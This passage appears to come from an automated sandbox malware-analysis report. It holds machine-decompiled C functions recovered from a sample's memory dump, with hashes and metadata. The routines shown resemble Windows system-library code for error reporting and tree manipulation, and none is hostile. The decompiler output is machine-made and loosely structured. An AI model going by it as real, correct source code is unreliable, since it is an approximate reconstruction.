                            						_t52 = 1;
                            					} else {
                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                            						}
                            					}
                            					_t35 = _t52;
                            					goto L8;
                            				}
                            			}


































                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 540f478f3c2394a3a0311829671666a785224e166faae598b0853c649f7dbf2c
                            • Instruction ID: 838ff5c54d5d90d7bf912c9c0be1768cd03b88fb3fce44b08c539895f6d2e1af
                            • Opcode Fuzzy Hash: 540f478f3c2394a3a0311829671666a785224e166faae598b0853c649f7dbf2c
                            • Instruction Fuzzy Hash: 8F318DB1548305DFC361DF68C984A6BFBE8EBA9654F00092EF9D583251E734DD04CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E01721B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                            				intOrPtr _v8;
                            				char _v16;
                            				intOrPtr* _t26;
                            				intOrPtr _t29;
                            				void* _t30;
                            				signed int _t31;
                            
                            				_t27 = __ecx;
                            				_t29 = __edx;
                            				_t31 = 0;
                            				_v8 = __edx;
                            				if(__edx == 0) {
                            					L18:
                            					_t30 = 0xc000000d;
                            					goto L12;
                            				} else {
                            					_t26 = _a4;
                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                            						goto L18;
                            					} else {
                            						E0175BB40(__ecx,  &_v16, __ecx);
                            						_push(_t26);
                            						_push(0);
                            						_push(0);
                            						_push(_t29);
                            						_push( &_v16);
                            						_t30 = E0175A9B0();
                            						if(_t30 >= 0) {
                            							_t19 =  *_t26;
                            							if( *_t26 != 0) {
                            								goto L7;
                            							} else {
                            								 *_a8 =  *_a8 & 0;
                            							}
                            						} else {
                            							if(_t30 != 0xc0000023) {
                            								L9:
                            								_push(_t26);
                            								_push( *_t26);
                            								_push(_t31);
                            								_push(_v8);
                            								_push( &_v16);
                            								_t30 = E0175A9B0();
                            								if(_t30 < 0) {
                            									L12:
                            									if(_t31 != 0) {
                            										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                            									}
                            								} else {
                            									 *_a8 = _t31;
                            								}
                            							} else {
                            								_t19 =  *_t26;
                            								if( *_t26 == 0) {
                            									_t31 = 0;
                            								} else {
                            									L7:
                            									_t31 = L01734620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                            								}
                            								if(_t31 == 0) {
                            									_t30 = 0xc0000017;
                            								} else {
                            									goto L9;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _t30;
                            			}










                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: WindowsExcludedProcs
                            • API String ID: 0-3583428290
                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction ID: 5b877faa07212c4f292fb337010d259323e87378940d9e1e1b5908d5927b844f
                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction Fuzzy Hash: 0621F27A901239ABDF229A598844F6FFBADFF80A50F1544A5FE048B204E630DC02D7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E017C8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t35;
                            				void* _t41;
                            
                            				_t40 = __esi;
                            				_t39 = __edi;
                            				_t38 = __edx;
                            				_t35 = __ecx;
                            				_t34 = __ebx;
                            				_push(0x74);
                            				_push(0x17f0d50);
                            				E0176D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                            					L017A5720(0x65, 0, "Critical error detected %lx\n", _t35);
                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                            						asm("int3");
                            						 *(_t41 - 4) = 0xfffffffe;
                            					}
                            				}
                            				 *(_t41 - 4) = 1;
                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                            				 *((intOrPtr*)(_t41 - 0x64)) = L0176DEF0;
                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                            				_push(_t41 - 0x70);
                            				L0176DEF0(1, _t38);
                            				 *(_t41 - 4) = 0xfffffffe;
                            				return E0176D130(_t34, _t39, _t40);
                            			}






                            Strings
                            • Critical error detected %lx, xrefs: 017C8E21
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: Critical error detected %lx
                            • API String ID: 0-802127002
                            • Opcode ID: c545a637ae258bfa3990a7e70bec44e05c137dcc51e54331537cfec9a65f900d
                            • Instruction ID: 587bd6eb65adf29946d94c7844368c6c55e803bfa2ab679b86252484f5f7d243
                            • Opcode Fuzzy Hash: c545a637ae258bfa3990a7e70bec44e05c137dcc51e54331537cfec9a65f900d
                            • Instruction Fuzzy Hash: 141139B1D14348DADB25CFE9C9097EDFBB4AB18715F24425DD5696B382C3740601CF15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 99%
                            			E0171F900(signed int _a4, signed int _a8) {
                            				signed char _v5;
                            				signed char _v6;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				signed char _t285;
                            				signed int _t289;
                            				signed char _t292;
                            				signed int _t293;
                            				signed char _t295;
                            				signed int _t300;
                            				signed int _t301;
                            				signed char _t306;
                            				signed char _t307;
                            				signed char _t308;
                            				signed int _t310;
                            				signed int _t311;
                            				signed int _t312;
                            				signed char _t314;
                            				signed int _t316;
                            				signed int _t318;
                            				signed int _t319;
                            				signed int _t320;
                            				signed int _t322;
                            				signed int _t323;
                            				signed int _t328;
                            				signed char _t329;
                            				signed int _t337;
                            				signed int _t339;
                            				signed int _t343;
                            				signed int _t345;
                            				signed int _t348;
                            				signed char _t350;
                            				signed int _t351;
                            				signed char _t353;
                            				signed char _t356;
                            				signed int _t357;
                            				signed char _t359;
                            				signed int _t360;
                            				signed char _t363;
                            				signed int _t364;
                            				signed int _t366;
                            				signed int* _t372;
                            				signed char _t373;
                            				signed char _t378;
                            				signed int _t379;
                            				signed int* _t382;
                            				signed int _t383;
                            				signed char _t385;
                            				signed int _t387;
                            				signed int _t388;
                            				signed char _t390;
                            				signed int _t393;
                            				signed int _t395;
                            				signed char _t397;
                            				signed int _t401;
                            				signed int _t405;
                            				signed int _t407;
                            				signed int _t409;
                            				signed int _t410;
                            				signed int _t413;
                            				signed char _t415;
                            				signed int _t416;
                            				signed char _t418;
                            				signed int _t419;
                            				signed int _t421;
                            				signed int _t422;
                            				signed int _t423;
                            				signed char* _t425;
                            				signed char _t426;
                            				signed char _t427;
                            				signed int _t428;
                            				signed int _t429;
                            				signed int _t431;
                            				signed int _t432;
                            				signed int _t434;
                            				signed int _t436;
                            				signed int _t444;
                            				signed int _t445;
                            				signed int _t446;
                            				signed int _t452;
                            				signed int _t454;
                            				signed int _t455;
                            				signed int _t456;
                            				signed int _t457;
                            				signed int _t461;
                            				signed int _t462;
                            				signed int _t464;
                            				signed int _t467;
                            				signed int _t470;
                            				signed int _t474;
                            				signed int _t475;
                            				signed int _t477;
                            				signed int _t481;
                            				signed int _t483;
                            				signed int _t486;
                            				signed int _t487;
                            				signed int _t488;
                            
                            				_t285 =  *(_a4 + 4);
                            				_t444 = _a8;
                            				_t452 =  *_t444;
                            				_t421 = _t285 & 1;
                            				if(_t421 != 0) {
                            					if(_t452 != 0) {
                            						_t452 = _t452 ^ _t444;
                            					}
                            				}
                            				_t393 =  *(_t444 + 4);
                            				if(_t421 != 0) {
                            					if(_t393 != 0) {
                            						_t393 = _t393 ^ _t444;
                            					}
                            				}
                            				_t426 = _t393;
                            				if(_t452 != 0) {
                            					_t426 = _t452;
                            				}
                            				_v5 = _t285 & 0x00000001;
                            				asm("sbb eax, eax");
                            				if((_t393 &  ~_t452) != 0) {
                            					_t289 = _t393;
                            					_t427 = _v5;
                            					_t422 = _t393;
                            					_v12 = _t393;
                            					_v16 = 1;
                            					if( *_t393 != 0) {
                            						_v16 = _v16 & 0x00000000;
                            						_t445 =  *_t393;
                            						goto L115;
                            						L116:
                            						_t289 = _t445;
                            						L117:
                            						_t445 =  *_t289;
                            						if(_t445 != 0) {
                            							L115:
                            							_t422 = _t289;
                            							if(_t427 != 0) {
                            								goto L183;
                            							}
                            							goto L116;
                            						} else {
                            							_t444 = _a8;
                            							_v12 = _t289;
                            							goto L27;
                            						}
                            						L183:
                            						if(_t445 == 0) {
                            							goto L116;
                            						}
                            						_t289 = _t289 ^ _t445;
                            						goto L117;
                            					}
                            					L27:
                            					if(_t427 != 0) {
                            						if(_t452 == 0) {
                            							goto L28;
                            						}
                            						_t428 = _t289 ^ _t452;
                            						L29:
                            						 *_t289 = _t428;
                            						_t429 =  *(_t452 + 8);
                            						_v20 = _t429;
                            						_t426 = _t429 & 0xfffffffc;
                            						_t292 =  *(_a4 + 4) & 0x00000001;
                            						_v6 = _t292;
                            						_t293 = _v12;
                            						if(_t292 != 0) {
                            							if(_t426 != 0) {
                            								_t426 = _t426 ^ _t452;
                            							}
                            						}
                            						if(_t426 != _t444) {
                            							L174:
                            							_t423 = 0x1d;
                            							asm("int 0x29");
                            							goto L175;
                            						} else {
                            							_t436 = _t293;
                            							if(_v6 != 0) {
                            								_t436 = _t436 ^ _t452;
                            							}
                            							_v20 = _v20 & 0x00000003;
                            							_v20 = _v20 | _t436;
                            							 *(_t452 + 8) = _v20;
                            							_t426 =  *(_t393 + 8) & 0xfffffffc;
                            							_t356 =  *(_a4 + 4) & 0x00000001;
                            							_v6 = _t356;
                            							_t357 = _v12;
                            							if(_t356 != 0) {
                            								if(_t426 != 0) {
                            									_t426 = _t426 ^ _t393;
                            								}
                            							}
                            							if(_t426 != _t444) {
                            								goto L174;
                            							} else {
                            								_t483 = _t393 ^ _t357;
                            								_v24 = _t483;
                            								if(_v6 == 0) {
                            									_v24 = _t357;
                            								}
                            								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
                            								_t426 =  *(_t357 + 4);
                            								_t444 = _a8;
                            								_t359 =  *(_a4 + 4) & 0x00000001;
                            								_v6 = _t359;
                            								_t360 = _v12;
                            								_v24 = _t483;
                            								if(_t359 != 0) {
                            									_v24 = _t483;
                            									if(_t426 == 0) {
                            										goto L37;
                            									}
                            									_t426 = _t426 ^ _t360;
                            									L38:
                            									if(_v6 == 0) {
                            										_t483 = _t393;
                            									}
                            									_t413 =  *(_t360 + 8);
                            									 *(_t360 + 4) = _t483;
                            									_t452 = _t413 & 0xfffffffc;
                            									_v5 = _t413;
                            									_t363 =  *(_a4 + 4) & 0x00000001;
                            									_v6 = _t363;
                            									if(_t363 != 0) {
                            										_t364 = _v12;
                            										_v5 = _t413;
                            										if(_t452 == 0) {
                            											goto L41;
                            										}
                            										_v20 = _t452;
                            										_v20 = _v20 ^ _t364;
                            										L42:
                            										if(_v20 != _t422) {
                            											_v5 = _t413;
                            											if(_v6 == 0) {
                            												L199:
                            												_t366 = _v12;
                            												L200:
                            												if(_t452 != 0 || _t366 != _t422) {
                            													goto L174;
                            												} else {
                            													goto L43;
                            												}
                            											}
                            											_t366 = _v12;
                            											_v5 = _t413;
                            											if(_t452 == 0) {
                            												goto L199;
                            											}
                            											_t452 = _t452 ^ _t366;
                            											goto L200;
                            										}
                            										L43:
                            										_t486 =  *(_t444 + 8) & 0xfffffffc;
                            										if(_v6 != 0) {
                            											if(_t486 != 0) {
                            												_t486 = _t486 ^ _t444;
                            											}
                            											if(_v6 != 0 && _t486 != 0) {
                            												_t486 = _t486 ^ _t366;
                            											}
                            										}
                            										_t415 = _t413 & 0x00000003 | _t486;
                            										 *(_t366 + 8) = _t415;
                            										_t416 = _v12;
                            										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
                            										_t452 =  *(_t444 + 8);
                            										_t372 = _a4;
                            										if((_t452 & 0xfffffffc) == 0) {
                            											if( *_t372 != _t444) {
                            												goto L174;
                            											} else {
                            												 *_t372 = _t416;
                            												goto L52;
                            											}
                            										} else {
                            											_t452 = _t452 & 0xfffffffc;
                            											_t378 = _t372[1] & 0x00000001;
                            											_v6 = _t378;
                            											if(_t378 != 0) {
                            												if(_t452 != 0) {
                            													_t452 = _t452 ^ _t444;
                            												}
                            											}
                            											_t379 =  *(_t452 + 4);
                            											if(_v6 != 0) {
                            												if(_t379 != 0) {
                            													_t379 = _t379 ^ _t452;
                            												}
                            											}
                            											_v24 = _t379;
                            											_t382 = _t452 + (0 | _v24 == _t444) * 4;
                            											_v28 = _t382;
                            											_t383 =  *_t382;
                            											if(_v6 != 0) {
                            												if(_t383 != 0) {
                            													_t383 = _t383 ^ _t452;
                            												}
                            											}
                            											if(_t383 != _t444) {
                            												goto L174;
                            											} else {
                            												if(_v6 != 0) {
                            													_t487 = _t452 ^ _t416;
                            												} else {
                            													_t487 = _t416;
                            												}
                            												 *_v28 = _t487;
                            												L52:
                            												_t373 = _v5;
                            												L12:
                            												_t452 = _a4;
                            												_v5 = _t373 & 0x00000001;
                            												if(( *(_t452 + 4) & 0x00000001) != 0) {
                            													if(_t426 == 0) {
                            														goto L13;
                            													}
                            													_t306 = _t422 ^ _t426;
                            													L14:
                            													_t444 = _v16;
                            													 *(_t422 + _t444 * 4) = _t306;
                            													if(_t426 != 0) {
                            														_t306 =  *(_t426 + 8) & 0xfffffffc;
                            														_t418 =  *(_t452 + 4) & 0x00000001;
                            														_v6 = _t418;
                            														_t419 = _v12;
                            														if(_t418 != 0) {
                            															if(_t306 != 0) {
                            																_t306 = _t306 ^ _t426;
                            															}
                            														}
                            														if(_t306 != _t419) {
                            															goto L174;
                            														} else {
                            															if(_v6 != 0) {
                            																if(_t422 != 0) {
                            																	_t422 = _t422 ^ _t426;
                            																}
                            															}
                            															 *(_t426 + 8) = _t422;
                            															L24:
                            															return _t306;
                            														}
                            													}
                            													if(_v5 != _t426) {
                            														goto L24;
                            													} else {
                            														_t395 = _t452;
                            														_t306 =  *(_t395 + 4);
                            														L17:
                            														_t446 = _t423;
                            														_t434 = _v16 ^ 0x00000001;
                            														_v24 = _t446;
                            														_v12 = _t434;
                            														_t452 =  *(_t423 + _t434 * 4);
                            														if((_t306 & 0x00000001) != 0) {
                            															if(_t452 == 0) {
                            																goto L18;
                            															}
                            															_t426 = _t452 ^ _t446;
                            															L19:
                            															if(( *(_t426 + 8) & 0x00000001) != 0) {
                            																_t310 =  *(_t426 + 8) & 0xfffffffc;
                            																_t444 = _t306 & 1;
                            																if(_t444 != 0) {
                            																	if(_t310 != 0) {
                            																		_t310 = _t310 ^ _t426;
                            																	}
                            																}
                            																if(_t310 != _t423) {
                            																	goto L174;
                            																} else {
                            																	if(_t444 != 0) {
                            																		if(_t452 != 0) {
                            																			_t452 = _t452 ^ _t423;
                            																		}
                            																	}
                            																	if(_t452 != _t426) {
                            																		goto L174;
                            																	} else {
                            																		_t452 =  *(_t423 + 8) & 0xfffffffc;
                            																		if(_t444 != 0) {
                            																			if(_t452 == 0) {
                            																				L170:
                            																				if( *_t395 != _t423) {
                            																					goto L174;
                            																				} else {
                            																					 *_t395 = _t426;
                            																					L140:
                            																					if(_t444 != 0) {
                            																						if(_t452 != 0) {
                            																							_t452 = _t452 ^ _t426;
                            																						}
                            																					}
                            																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                            																					_t300 =  *(_t426 + _v16 * 4);
                            																					if(_t444 != 0) {
                            																						if(_t300 == 0) {
                            																							goto L143;
                            																						}
                            																						_t300 = _t300 ^ _t426;
                            																						goto L142;
                            																					} else {
                            																						L142:
                            																						if(_t300 != 0) {
                            																							_t401 =  *(_t300 + 8);
                            																							_t452 = _t401 & 0xfffffffc;
                            																							if(_t444 != 0) {
                            																								if(_t452 != 0) {
                            																									_t452 = _t452 ^ _t300;
                            																								}
                            																							}
                            																							if(_t452 != _t426) {
                            																								goto L174;
                            																							} else {
                            																								if(_t444 != 0) {
                            																									_t481 = _t300 ^ _t423;
                            																								} else {
                            																									_t481 = _t423;
                            																								}
                            																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
                            																								goto L143;
                            																							}
                            																						}
                            																						L143:
                            																						if(_t444 != 0) {
                            																							if(_t300 != 0) {
                            																								_t300 = _t300 ^ _t423;
                            																							}
                            																						}
                            																						 *(_t423 + _v12 * 4) = _t300;
                            																						_t454 = _t426;
                            																						if(_t444 != 0) {
                            																							_t455 = _t454 ^ _t423;
                            																							_t301 = _t455;
                            																						} else {
                            																							_t301 = _t423;
                            																							_t455 = _t454 ^ _t301;
                            																						}
                            																						 *(_t426 + _v16 * 4) = _t301;
                            																						_t395 = _a4;
                            																						if(_t444 == 0) {
                            																							_t455 = _t426;
                            																						}
                            																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
                            																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
                            																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
                            																						_t426 =  *(_t423 + _v12 * 4);
                            																						_t306 =  *(_t395 + 4);
                            																						if((_t306 & 0x00000001) != 0) {
                            																							if(_t426 != 0) {
                            																								_t426 = _t426 ^ _t423;
                            																							}
                            																						}
                            																						_t446 = _v24;
                            																						goto L20;
                            																					}
                            																				}
                            																			}
                            																			_t452 = _t452 ^ _t423;
                            																		}
                            																		if(_t452 == 0) {
                            																			goto L170;
                            																		}
                            																		_t311 =  *(_t452 + 4);
                            																		if(_t444 != 0) {
                            																			if(_t311 != 0) {
                            																				_t311 = _t311 ^ _t452;
                            																			}
                            																		}
                            																		if(_t311 == _t423) {
                            																			if(_t444 != 0) {
                            																				L175:
                            																				_t295 = _t452 ^ _t426;
                            																				goto L169;
                            																			} else {
                            																				_t295 = _t426;
                            																				L169:
                            																				 *(_t452 + 4) = _t295;
                            																				goto L140;
                            																			}
                            																		} else {
                            																			_t312 =  *_t452;
                            																			if(_t444 != 0) {
                            																				if(_t312 != 0) {
                            																					_t312 = _t312 ^ _t452;
                            																				}
                            																			}
                            																			if(_t312 != _t423) {
                            																				goto L174;
                            																			} else {
                            																				if(_t444 != 0) {
                            																					_t314 = _t452 ^ _t426;
                            																				} else {
                            																					_t314 = _t426;
                            																				}
                            																				 *_t452 = _t314;
                            																				goto L140;
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            															L20:
                            															_t456 =  *_t426;
                            															_t307 = _t306 & 0x00000001;
                            															if(_t456 != 0) {
                            																if(_t307 != 0) {
                            																	_t456 = _t456 ^ _t426;
                            																}
                            																if(( *(_t456 + 8) & 0x00000001) == 0) {
                            																	goto L21;
                            																} else {
                            																	L56:
                            																	_t461 =  *(_t426 + _v12 * 4);
                            																	if(_t307 != 0) {
                            																		if(_t461 == 0) {
                            																			L59:
                            																			_t462 = _v16;
                            																			_t444 =  *(_t426 + _t462 * 4);
                            																			if(_t307 != 0) {
                            																				if(_t444 != 0) {
                            																					_t444 = _t444 ^ _t426;
                            																				}
                            																			}
                            																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
                            																			_t452 = _t462 ^ 0x00000001;
                            																			_t405 =  *(_t395 + 4) & 1;
                            																			_t316 =  *(_t444 + 8) & 0xfffffffc;
                            																			_v28 = _t405;
                            																			_v24 = _t452;
                            																			if(_t405 != 0) {
                            																				if(_t316 != 0) {
                            																					_t316 = _t316 ^ _t444;
                            																				}
                            																			}
                            																			if(_t316 != _t426) {
                            																				goto L174;
                            																			} else {
                            																				_t318 = _t452 ^ 0x00000001;
                            																				_v32 = _t318;
                            																				_t319 =  *(_t426 + _t318 * 4);
                            																				if(_t405 != 0) {
                            																					if(_t319 != 0) {
                            																						_t319 = _t319 ^ _t426;
                            																					}
                            																				}
                            																				if(_t319 != _t444) {
                            																					goto L174;
                            																				} else {
                            																					_t320 =  *(_t423 + _t452 * 4);
                            																					if(_t405 != 0) {
                            																						if(_t320 != 0) {
                            																							_t320 = _t320 ^ _t423;
                            																						}
                            																					}
                            																					if(_t320 != _t426) {
                            																						goto L174;
                            																					} else {
                            																						_t322 =  *(_t426 + 8) & 0xfffffffc;
                            																						if(_t405 != 0) {
                            																							if(_t322 != 0) {
                            																								_t322 = _t322 ^ _t426;
                            																							}
                            																						}
                            																						if(_t322 != _t423) {
                            																							goto L174;
                            																						} else {
                            																							_t464 = _t423 ^ _t444;
                            																							_t323 = _t464;
                            																							if(_t405 == 0) {
                            																								_t323 = _t444;
                            																							}
                            																							 *(_t423 + _v24 * 4) = _t323;
                            																							_t407 = _v28;
                            																							if(_t407 != 0) {
                            																								if(_t423 != 0) {
                            																									L72:
                            																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
                            																									_t328 =  *(_t444 + _v24 * 4);
                            																									if(_t407 != 0) {
                            																										if(_t328 == 0) {
                            																											L74:
                            																											if(_t407 != 0) {
                            																												if(_t328 != 0) {
                            																													_t328 = _t328 ^ _t426;
                            																												}
                            																											}
                            																											 *(_t426 + _v32 * 4) = _t328;
                            																											_t467 = _t426 ^ _t444;
                            																											_t329 = _t467;
                            																											if(_t407 == 0) {
                            																												_t329 = _t426;
                            																											}
                            																											 *(_t444 + _v24 * 4) = _t329;
                            																											if(_v28 == 0) {
                            																												_t467 = _t444;
                            																											}
                            																											_t395 = _a4;
                            																											_t452 = _t426;
                            																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
                            																											_t426 = _t444;
                            																											L80:
                            																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
                            																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
                            																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
                            																											_t337 =  *(_t426 + 8) & 0xfffffffc;
                            																											_t444 =  *(_t395 + 4) & 1;
                            																											if(_t444 != 0) {
                            																												if(_t337 != 0) {
                            																													_t337 = _t337 ^ _t426;
                            																												}
                            																											}
                            																											if(_t337 != _t423) {
                            																												goto L174;
                            																											} else {
                            																												_t339 =  *(_t423 + _v12 * 4);
                            																												if(_t444 != 0) {
                            																													if(_t339 != 0) {
                            																														_t339 = _t339 ^ _t423;
                            																													}
                            																												}
                            																												if(_t339 != _t426) {
                            																													goto L174;
                            																												} else {
                            																													_t452 =  *(_t423 + 8) & 0xfffffffc;
                            																													if(_t444 != 0) {
                            																														if(_t452 == 0) {
                            																															L160:
                            																															if( *_t395 != _t423) {
                            																																goto L174;
                            																															} else {
                            																																 *_t395 = _t426;
                            																																L93:
                            																																if(_t444 != 0) {
                            																																	if(_t452 != 0) {
                            																																		_t452 = _t452 ^ _t426;
                            																																	}
                            																																}
                            																																_t409 = _v16;
                            																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                            																																_t343 =  *(_t426 + _t409 * 4);
                            																																if(_t444 != 0) {
                            																																	if(_t343 == 0) {
                            																																		goto L96;
                            																																	}
                            																																	_t343 = _t343 ^ _t426;
                            																																	goto L95;
                            																																} else {
                            																																	L95:
                            																																	if(_t343 != 0) {
                            																																		_t410 =  *(_t343 + 8);
                            																																		_t452 = _t410 & 0xfffffffc;
                            																																		if(_t444 != 0) {
                            																																			if(_t452 != 0) {
                            																																				_t452 = _t452 ^ _t343;
                            																																			}
                            																																		}
                            																																		if(_t452 != _t426) {
                            																																			goto L174;
                            																																		} else {
                            																																			if(_t444 != 0) {
                            																																				_t474 = _t343 ^ _t423;
                            																																			} else {
                            																																				_t474 = _t423;
                            																																			}
                            																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
                            																																			_t409 = _v16;
                            																																			goto L96;
                            																																		}
                            																																	}
                            																																	L96:
                            																																	if(_t444 != 0) {
                            																																		if(_t343 != 0) {
                            																																			_t343 = _t343 ^ _t423;
                            																																		}
                            																																	}
                            																																	 *(_t423 + _v12 * 4) = _t343;
                            																																	if(_t444 != 0) {
                            																																		_t345 = _t426 ^ _t423;
                            																																		_t470 = _t345;
                            																																	} else {
                            																																		_t345 = _t423;
                            																																		_t470 = _t426 ^ _t345;
                            																																	}
                            																																	 *(_t426 + _t409 * 4) = _t345;
                            																																	if(_t444 == 0) {
                            																																		_t470 = _t426;
                            																																	}
                            																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
                            																																	 *(_t423 + 8) = _t306;
                            																																	goto L24;
                            																																}
                            																															}
                            																														}
                            																														_t452 = _t452 ^ _t423;
                            																													}
                            																													if(_t452 == 0) {
                            																														goto L160;
                            																													}
                            																													_t348 =  *(_t452 + 4);
                            																													if(_t444 != 0) {
                            																														if(_t348 != 0) {
                            																															_t348 = _t348 ^ _t452;
                            																														}
                            																													}
                            																													if(_t348 == _t423) {
                            																														if(_t444 != 0) {
                            																															_t350 = _t452 ^ _t426;
                            																														} else {
                            																															_t350 = _t426;
                            																														}
                            																														 *(_t452 + 4) = _t350;
                            																														goto L93;
                            																													} else {
                            																														_t351 =  *_t452;
                            																														if(_t444 != 0) {
                            																															if(_t351 != 0) {
                            																																_t351 = _t351 ^ _t452;
                            																															}
                            																														}
                            																														if(_t351 != _t423) {
                            																															goto L174;
                            																														} else {
                            																															if(_t444 != 0) {
                            																																_t353 = _t452 ^ _t426;
                            																															} else {
                            																																_t353 = _t426;
                            																															}
                            																															 *_t452 = _t353;
                            																															goto L93;
                            																														}
                            																													}
                            																												}
                            																											}
                            																										}
                            																										_t328 = _t328 ^ _t444;
                            																									}
                            																									if(_t328 != 0) {
                            																										_t475 =  *(_t328 + 8);
                            																										_v20 = _t475;
                            																										_t452 = _t475 & 0xfffffffc;
                            																										if(_t407 != 0) {
                            																											if(_t452 != 0) {
                            																												_t452 = _t452 ^ _t328;
                            																											}
                            																										}
                            																										if(_t452 != _t444) {
                            																											goto L174;
                            																										} else {
                            																											if(_t407 != 0) {
                            																												_t477 = _t328 ^ _t426;
                            																											} else {
                            																												_t477 = _t426;
                            																											}
                            																											_v20 = _v20 & 0x00000003;
                            																											_v20 = _v20 | _t477;
                            																											 *(_t328 + 8) = _v20;
                            																											goto L74;
                            																										}
                            																									}
                            																									goto L74;
                            																								}
                            																							}
                            																							_t464 = _t423;
                            																							goto L72;
                            																						}
                            																					}
                            																				}
                            																			}
                            																		}
                            																		_t452 = _t461 ^ _t426;
                            																	}
                            																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
                            																		goto L59;
                            																	} else {
                            																		goto L80;
                            																	}
                            																}
                            															}
                            															L21:
                            															_t457 =  *(_t426 + 4);
                            															if(_t457 != 0) {
                            																if(_t307 != 0) {
                            																	_t457 = _t457 ^ _t426;
                            																}
                            																if(( *(_t457 + 8) & 0x00000001) == 0) {
                            																	goto L22;
                            																} else {
                            																	goto L56;
                            																}
                            															}
                            															L22:
                            															_t308 =  *(_t423 + 8);
                            															if((_t308 & 0x00000001) == 0) {
                            																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                            																_t306 =  *(_t395 + 4);
                            																_t431 =  *(_t423 + 8) & 0xfffffffc;
                            																_t397 = _t306 & 0x00000001;
                            																if(_t397 != 0) {
                            																	if(_t431 == 0) {
                            																		goto L110;
                            																	}
                            																	_t423 = _t423 ^ _t431;
                            																	L111:
                            																	if(_t423 == 0) {
                            																		goto L24;
                            																	}
                            																	_t432 =  *(_t423 + 4);
                            																	if(_t397 != 0) {
                            																		if(_t432 != 0) {
                            																			_t432 = _t432 ^ _t423;
                            																		}
                            																	}
                            																	_v16 = 0 | _t432 == _t446;
                            																	_t395 = _a4;
                            																	goto L17;
                            																}
                            																L110:
                            																_t423 = _t431;
                            																goto L111;
                            															} else {
                            																_t306 = _t308 & 0x000000fe;
                            																 *(_t423 + 8) = _t306;
                            																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                            																goto L24;
                            															}
                            														}
                            														L18:
                            														_t426 = _t452;
                            														goto L19;
                            													}
                            												}
                            												L13:
                            												_t306 = _t426;
                            												goto L14;
                            											}
                            										}
                            									}
                            									L41:
                            									_t366 = _v12;
                            									_v20 = _t452;
                            									goto L42;
                            								}
                            								L37:
                            								_t483 = _v24;
                            								goto L38;
                            							}
                            						}
                            					}
                            					L28:
                            					_t428 = _t452;
                            					goto L29;
                            				}
